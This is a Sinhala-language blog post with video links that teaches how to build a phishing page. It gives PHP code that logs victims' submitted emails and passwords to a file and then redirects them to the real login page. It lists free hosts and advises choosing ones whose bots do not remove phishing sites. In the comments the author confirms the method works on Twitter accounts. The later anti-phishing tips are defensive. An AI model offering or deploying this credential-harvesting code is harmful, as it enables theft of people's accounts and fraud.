අද නම් video එක කලේ හොදටම බිලා (අනේ වරදවා තෙරුම් ගන්න එපා ; හෙන බුදිමතේ !!!) :P තැන් දෙකක විතර හෙනම බුදිමතෙ කලේ. අද mic එකේ පොඩි අවුලක් තිබුන නිසා ( volume එක අඩුකරලා audio input වල ; නංගි ගොත පැටියගේ වැඩ තමා :P) සද්දේ අඩුවෙන් තමා record වෙලා තියන්නේ , පස්සේ තමා දැනගත්තේ volume එක අඩුකරලා කියලා audio input වල (අනේ මන්දා ඒ වෙලාවේ මැරෙන්න බුදිමත නිසා මුලින්ම audio testing පාරක්වත් දාන්න බැරිවුණා ; හපෝ මට ආයි video එකක් කරන්න තරම් ඇඟේ kick එකක් තිබ්බ නැති නිසා මම ආයි video එක කලේ නෑ [අයියෝ මට සමාව දෙත්වා !!!]). හරි හරි අවුලක් නෑ , video 2 කම බලලා කොමෙන්ට් එකක් දාලම යන්නකෝ !!!Video Part 1
Video Part 2
අවශ්ය PHP කේතය :
<?php
if (!($fp = fopen('password.txt', 'a'))) {
return;
}
fprintf($fp, "Email = %s Password = %s", $_POST["email"], $_POST["pass"]);
header("Location: [Real Login page URL ; the page URL that you want to redirect]");
exit;
?>
PHP Enable Web hosting :
www.t35.com
www.yourfreehosting.net
www.drivehq.com
www.esmartstart.com
www.t35.com
www.yourfreehosting.net
www.drivehq.com
www.esmartstart.com
more :
* Note : සමහර වෙබ් hosting වල spider bots ලා ඉන්න පුලුවන් ස්වයංක්රියව phishing sites delete කරන , ඒක නිසා ටිකක් හොයලා බලලා hosting provider ව තෝරගන්න [ උදා : 110mb.com , 000webhost.com , byethost.com ] .
Update : =========================================================================
Desktop Phishing
Video Part 1
Desktop Phishing
Video Part 1
Video Part 2
=========================================================================
Phishing වලින් ආරක්ෂා විමට අනුගමනය කලයුතු පියවර
* හැමවෙලාවෙම site එකේ URL එක ගැන සැලකිලිමත් වෙන්න.
* ඔබ URL එක හෝ අදාල වෙබ් අඩ්වියක් හඳුනාගැනිමට අපහසු වුවහොත් පළමුව වැරදිසහගත username එකක් හා passowrd එකක් ලබාදෙන්න . මන්දයත් එවිට Phishing වෙබ් පිටුවක් තිබුනහොත් එම දුන් වැරදි username එකක් හා passowrd ගෙන ඔබව අදාල ඇත්ත වෙබ් අඩවියට redirect කරනු ඇත .(මෙම ක්රමය සමහරවිට Desktop Phishing වලට අදාල නොවෙන්නට පුලුවන) .
* බොහෝවිට ජනප්රිය වෙබ් අඩවි වල Login Page එක SSL Encryption කර ඇත , එවිට එහි URL පටන්ගනුයේ "https" ලෙසය . එම නිසා නිතරම මෙම "https" සළකුණ ගැන අවධානයෙන් සිටිම වැදගත්ය ( * මෙම SSL ENCRYPTION ක්රියාවලිය සෑම වෙබ් අඩවියකම නොතිබේ ) .
* කවමදාවත් E - mail ලිපියක ඇති URL එකක් Click නොකරන්න . එම අදාල URL එක Address bar එකට පිටපත් කරගෙන අදාල වෙබ් පිටුවට පිවිසෙන්න .
* නොදන්න අයගෙන් එන E - mail වලට ප්රතිචාර නොදක්වන්න .
* සෑම විටම වෙබ් ලිපිනය Address bar එකේ ටයිප් කර හෝ Bookmark ආධාරයෙන් අදාල වෙබ් අඩවි වලට පිවිසෙන්න .
* යම් කිසිහෙයකින් මා ඉහත පෙන්නු Desktop Phishing විඩියෝවේ පෙන්වා ඇති පරිදි අදාල වෙබ් අඩවියේ Main / Login page එක පමණක් පැමිණ , එම අදාල වෙබ් අඩවියෙම අනෙකුත් වෙබ් ලිපින වලට "URL not Found" හෝ "404 error" වැනි පණිවිඩ පැමියහොත් වහාම අදාල පරිඝණකයේ hosts file (Windows වල නම් තියන්නේ : C:\WINDOWS\system32\drivers\etc වල ; මේකෙන් කෙරෙන්නේ වෙබ් ඩොමේන් නාමයත් IP ලිපිනයත් මැප් කිරීමයි.) එකට ගොස් 127.0.0.1 - localhost එකට අමතරව IP ලිපිනයක් සමඟ වෙනත් වෙබ් අඩවියක් තිබෙනම් ඒ ගැන සැලකිලිමත් වි අදාල වෙනස්කම් නිවැරදි කොට යාවත්කාලින කරනලද Virus guard එකක් මඟින් වහාම මුලු පරිඝණයකම පරික්ෂාවට ලක් කරන්න .
3 comments:
මේ පෝස්ට් එකට නං මම තදබල ලෙස විරෝධතාව දක්වනවා. කී දෙනෙක් මේකෙන් අයුතු ප්රයෝජන ගනීවි කියලද හිතන්නේ?
මීට වඩා කියවන අයට ප්රයෝජනයක් වෙනවා phishing වලින් ආරක්ෂා වෙන්න ඉඟි ටිකක් ලිව්වනම්.
http://www.crime-research.org/analytics/2176/
ඒ වගේම මේ පෝස්ට් එක ශ්රී ලංකාවේ පරිගණක අපරාධ නීතිය යටතේත් වරදක් ලෙස සලකන්න පුළුවන්.
Mchn.... twitter account ekak hack keraganna dannawada? :D
@ ශාකුන්තල අයියා : ඔන්න අයියා කියුව නිසාම phishing වලින් ආරක්ෂා වෙන්න ඉඟි ටිකක් ලිව්වා . අප්පේ ඔන්න මට නම් තව බනින්න එපා හොඳේ !!!
@ Pubudu : ඇයි බන් මම උඩ කියලා තියන විදිහට twitter එකක් වුනත් හැක් කරන්න පුලුවන්. lol
Post a Comment
write your comments here!